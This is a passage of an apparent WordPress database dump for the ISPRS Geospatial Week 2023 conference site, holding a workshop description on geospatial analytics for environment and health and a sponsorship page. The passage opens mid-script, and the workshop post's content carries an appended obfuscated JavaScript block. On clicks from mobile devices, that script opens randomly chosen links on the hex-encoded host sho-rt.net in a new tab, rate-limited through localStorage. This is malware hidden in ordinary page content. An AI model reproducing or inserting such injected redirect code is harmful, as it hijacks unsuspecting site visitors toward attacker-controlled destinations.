_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-02-04 03:43:19','2023-02-04 03:43:19','',3427,'https://gsw2023.com/?p=3742',0,'revision','',0),
(3743,1,'2023-02-04 03:49:51','2023-02-04 03:49:51','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"5px 0px 5px 0px\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em>\n\n&nbsp;\n\nThe main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\n&nbsp;\n\nI.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.\n\n&nbsp;\n\nII.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.\n\n&nbsp;\n\nIII.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.\n\n&nbsp;\n\nIV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?\n\n&nbsp;\n\nV.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes\n\n&nbsp;\n\nVI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.\n\n&nbsp;\n\n&nbsp;\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n 	<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n 	<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\nare the supporting working groups.\n\n&nbsp;\n\n&nbsp;\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n 	<li>Peng Yue, Wuhan University, PR China</li>\n 	<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n 	<li>Dr Suchita Gopal, Boston University. USA</li>\n 	<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n 	<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n 	<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n 	<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n 	<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n 	<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n&nbsp;\n\n&nbsp;\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\nThe authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</strong>','','inherit','closed','closed','','3427-autosave-v1','','','2023-02-04 03:49:51','2023-02-04 03:49:51','',3427,'https://gsw2023.com/?p=3743',0,'revision','',0),
(3744,1,'2023-02-04 03:59:43','2023-02-04 03:59:43','[vc_row][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\r\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\r\n<h5></h5>\r\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\r\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\r\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\r\n<h5></h5>\r\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\r\n<h5></h5>\r\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\r\n<h5></h5>\r\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\r\n<h5></h5>\r\n<h5>The GSW2023 Organizing Committee.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\r\n<strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]\r\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\r\n(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\r\n<strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\r\n 	<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\r\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\r\n<h5></h5>\r\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\r\n&nbsp;\r\n\r\n<strong>Main Campus</strong>\r\n\r\n<strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong>\r\n\r\n<strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong>\r\n\r\n<strong>Tel :(+203) 5565429/ 5506042</strong>\r\n\r\n<b>Fax:(+203) 5487786/ 5506042  </b>\r\n\r\n&nbsp;\r\n\r\n<strong>Alexandria, </strong><strong>Abu kir Campus</strong>\r\n\r\n<strong>Tel :(+203) 5622366/ 5622388</strong>\r\n\r\n<b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 